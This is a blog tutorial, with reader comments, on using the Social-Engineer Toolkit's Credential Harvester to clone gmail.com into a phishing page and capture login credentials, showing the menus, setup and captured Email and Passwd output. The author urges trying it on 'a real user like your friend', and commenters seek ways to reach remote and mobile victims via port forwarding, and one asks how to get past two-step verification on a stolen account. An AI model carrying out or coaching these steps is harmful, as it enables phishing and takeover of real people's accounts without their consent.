Social Engineering Toolkit
Social engineering toolkit is the most powerful tool for performing social engineering attacks. It is the metasploit of social engineering in a way. It provides a very easy user interface to perform attacks like phishing, browser exploitation etc. In this tutorial we are going to see how it can be used to perform phishing attack to try to hack the gmail password of someone.
Credential Harvester Attack
Credential Harvester attack is one of the options available inside SET, that can create phishing pages and start a server to serve the pages and catch any user login data. Lets do it and see how it works.
Start SET in a terminal. It should come up with its welcome screen.
.M"""bgd `7MM"""YMM MMP""MM""YMM ,MI "Y MM `7 P' MM `7 `MMb. MM d MM `YMMNq. MMmmMM MM . `MM MM Y , MM Mb dM MM ,M MM P"Ybmmd" .JMMmmmmMMM .JMML. [---] The Social-Engineer Toolkit (SET) [---] [---] Created by: David Kennedy (ReL1K) [---] [---] Development Team: JR DePre (pr1me) [---] [---] Development Team: Joey Furr (j0fer) [---] [---] Development Team: Thomas Werth [---] [---] Development Team: Garland [---] [---] Version: 3.6 [---] [---] Codename: 'MMMMhhhhmmmmmmmmm' [---] [---] Report bugs: [email protected] [---] [---] Follow me on Twitter: dave_rel1k [---] [---] Homepage: https://www.trustedsec.com [---] Welcome to the Social-Engineer Toolkit (SET). Your one stop shop for all of your social-engineering needs.. Join us on irc.freenode.net in channel #setoolkit The Social-Engineer Toolkit is a product of TrustedSec. Visit: https://www.trustedsec.com Select from the menu: 1) Social-Engineering Attacks 2) Fast-Track Penetration Testing 3) Third Party Modules 4) Update the Metasploit Framework 5) Update the Social-Engineer Toolkit 6) Update SET configuration 7) Help, Credits, and About 99) Exit the Social-Engineer Toolkit set>
Now for this particular attack type we need to select "Social-Engineering Attacks" from the main menu. Type 1 and press enter. It will again present with a menu that would look like this
Select from the menu: 1) Spear-Phishing Attack Vectors 2) Website Attack Vectors 3) Infectious Media Generator 4) Create a Payload and Listener 5) Mass Mailer Attack 6) Arduino-Based Attack Vector 7) SMS Spoofing Attack Vector 8) Wireless Access Point Attack Vector 9) QRCode Generator Attack Vector 10) Powershell Attack Vectors 11) Third Party Modules 99) Return back to the main menu.
Over here we have the option to select from various kinds of social engineering attacks. For our purpose select option 2 thats "Website Attack Vectors". Again will come another menu like below
1) Java Applet Attack Method 2) Metasploit Browser Exploit Method 3) Credential Harvester Attack Method 4) Tabnabbing Attack Method 5) Man Left in the Middle Attack Method 6) Web Jacking Attack Method 7) Multi-Attack Web Method 8) Victim Web Profiler 9) Create or import a CodeSigning Certificate 99) Return to Main Menu
This time along with this menu, there would be some explanation about each attack. As can be seen the Credential Harvester Attack Method is there on number 3 which we are going to use. It is explained as
The Credential Harvester method will utilize web cloning of a web-site that has a username and password field and harvest all the information posted to the website.
So select number 3 and proceed. It will present another menu like this
1) Web Templates 2) Site Cloner 3) Custom Import 99) Return to Webattack Menu
Now over here we are going to clone gmail.com to construct our phishing page. So select option 2.
set:webattack>2 [-] Credential harvester will allow you to utilize the clone capabilities within SET [-] to harvest credentials or parameters from a website as well as place them into a report [-] This option is used for what IP the server will POST to. [-] If you're using an external IP, use your external IP for this set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.1.7 [-] SET supports both HTTP and HTTPS [-] Example: http://www.thisisafakesite.com set:webattack> Enter the url to clone:http://www.gmail.com The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website. [!] I have read the above message. Press <return> to continue [*] Social-Engineer Toolkit Credential Harvester Attack [*] Credential Harvester is running on port 80 [*] Information will be displayed to you as it arrives below:
On selecting option 2, it will ask for 2 important piece of information. The first is the ip address, to which it would submit the data and second is the url to clone which is in this case gmail.com
So enter the details and press enter when it asks to press return. Now the credential harvester would start a web server on port 80 which would serve the page gmail.com. Open the ip address of the machine in the browser from some other machine or just localhost. For example if SET is running on machine with ip address 192.168.1.10 then open that ip in a browser from another machine "http://192.168.1.10". Or give the ip address to someone else over the network :)
Now, when the username,password is entered and submitted, SET would capture the data and display on the terminal. Moreover, after capturing the data SET would redirect the user to the actual site, that is gmail.com
192.168.1.101 - - [15/Apr/2013 14:56:39] "GET / HTTP/1.1" 200 - 192.168.1.101 - - [15/Apr/2013 14:56:41] "GET / HTTP/1.1" 200 - 192.168.1.101 - - [15/Apr/2013 14:56:41] "GET / HTTP/1.1" 200 - [*] WE GOT A HIT! Printing the output: PARAM: continue=http://mail.google.com/mail/ PARAM: service=mail PARAM: rm=false PARAM: dsh=-2825129499091793842 PARAM: ltmpl=default PARAM: scc=1 PARAM: GALX=W37Icb1p3hI PARAM: pstMsg=1 PARAM: dnConn= PARAM: checkConnection= PARAM: checkedDomains=youtube PARAM: timeStmp= PARAM: secTok= PARAM: _utf8=? PARAM: bgresponse=!A0KPFdMuBMNZHUQml6hMF2ywpQ8AAxYG6ioCp0BIO0i9C5ftMNPRDRHTXxtZBB9qRoqUjLWLXn3dAJbKr3pT1eJNOwSvoduAgjxCOgnH8u3KZWS0A9kO9pIXNZXJ77OdsqK0T66SEdQLC9QV7QI8op3SM6ldH3rKqEbikKatd9DbrD7QLx3NWHfFR5O6r7PCgCDebXNk56ww-4wiFFmne05oW0ZDMstszHdBd67Z5lleTbvO2544iGrszfYzA1AJU1djcawccdN4bK2WUP1BUPQL3fidQRha5YeNe2cq81e-81DO4AjNX7OfINtsm8zpeSWOX5tHDNZWCnVwz6X5ItbkYNsfZuo9PQvJ5etzTvg6gwCpCZUDtHGR8AwSgxjQsy_hKfuJEmFNmNXFpyUi0Tu_Dw1WckbMNvRcrAhsb682WRI616BFc3aNbwNwfhRC1D6L20oxXcpzshpXxMLQDQr5GoUC6V7FIoTF9ma6mYddyrxdoxmo4d2Vh2vtovJxcYVMNRJpPa-7vvG7Ml_TQC9QJpJ21B608tccYKQpE9FzCzvmVxLMo1SHpr-Q3HChWkx7y-yq4Ba9fkKvt7XuOaq0isbZKeF_y8N1DJqGYusajFb7-jMDkQpnn6uQ-Y1OqalGQ56KSjgyWckWzPnTQ65V5V0doSbmcds8pvkWLFLQ8WM6EDMdX5RT9v5H5fkeMTWadlrJyumtHeerC5fw8qp4G_ZzH8232qySHq21XWvLxcoUS0eXHd8bGn1IA84ZpCuMt7WwEWuXss2OIrf_pfN4-YM3pLtuPIhuAnGoKAJsXS7Sib2cX34mEIiuIeC0fw1CbVqHVRz2nVT8a_QvvAeIYh5HhCz0dbn_P2FE_gosd3wG6Abnh7d08orC0TbzaW61y7H2r0owwU_SRDUKoPmVhVtp-GwjEoEanv7eZ22RgrE POSSIBLE USERNAME FIELD FOUND: Email=ghj POSSIBLE PASSWORD FIELD FOUND: Passwd=ghj PARAM: signIn=Sign+in PARAM: PersistentCookie=yes PARAM: rmShown=1 [*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
See the fields Email and Passwd, they contain the details typed by user. If you want to carry out this hack on a real user like your friend or someone, then you have to give them a link that they can open from their computer and access the SET clone of gmail.
If you have SET running on your local machine then you have to give your public ip address to the victim. He would open the link and get the login page of gmail. The rest of task is to persuade him to login through that page. If you are able to do so, then you get the login details. The credential harvester attack is not limited to just stealing the login data. It can capture any generic form submission.
Phishing attacks are very common in the form of spam emails. Hackers setup phishing pages on webhosts and then spread the links over email to users. The phishing pages includes simple email sites to bank logins and even more.
My IP address that servers as victim link
It won’t open on mobile browsers just only on my computer
Please how do I make an IP address phishing link open on my victims mobile browser
Any help please?
print error file not defined solve it plzzzzzzzzzz………
When I enter my IP and then the website and hit enter, I get the same options again:
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full Screen Attack Method
8) HTA Attack Method
Do you know why am I doing wrong?
that;s also my problem
I want to ask that the ip address that you have entered is your own ip address or your victims ip address……. plzzzz reply dude as fast as possible.
You have enter your ip address
it only works, if the attacker and victim are on the same network and it won’t work on the different network.
Then what about I want to attack a victim far off from me
It won’t work
So annoying because we re not on Same Wi-Fi
is there a way to only grab a CERTAIN post in the harvester? i am doing some work for a company and they don’t want me grabbing passwords, just usernames.. any ideas?
I have also port forwarded my router as well
So,i’ve done all this,but my fake/phish site isn’t on the World Wide Web,after doing some research i found out you have to Port Forward your stuff,i know you guys here may get annoyed by a question like this because you guys are expirienced,but how to Port Forward and what is it?I’ve looked it up on google/youtube but didn’t find anything i was looking for :/ Can anyone help?
port Forwarding means when you configure your router with ip address and port then it can be use over internet anywhere in world . when you forward your port you can hack your victim over internet still if he is not connected to your internet or over same wifi or lan as you want. your router must have options for port forwarding..
I guess its our own ip address…and the link should be opened in victims device.
well worked great, now I have the password of an email, but how i can trick gmail to let me access the account? from another country? she ask for 2 steps access, it is possible to use some of the param?
Very interesting post! i followed your instrustions, everything ok working inside LAN, but when i tried to use my external ip, the the rooter login page appeared instead of gmail. I use no-ip duc and hamachi vpn instead of port forwarding. Any guess? Thanks in advance
I have not used hamachi vpn, so not sure how to do this.
You have to configure port forwarding on your router. There will be a tutorial on this in the upcoming issue of ALM @ Facebook.com/AnonLinkPublications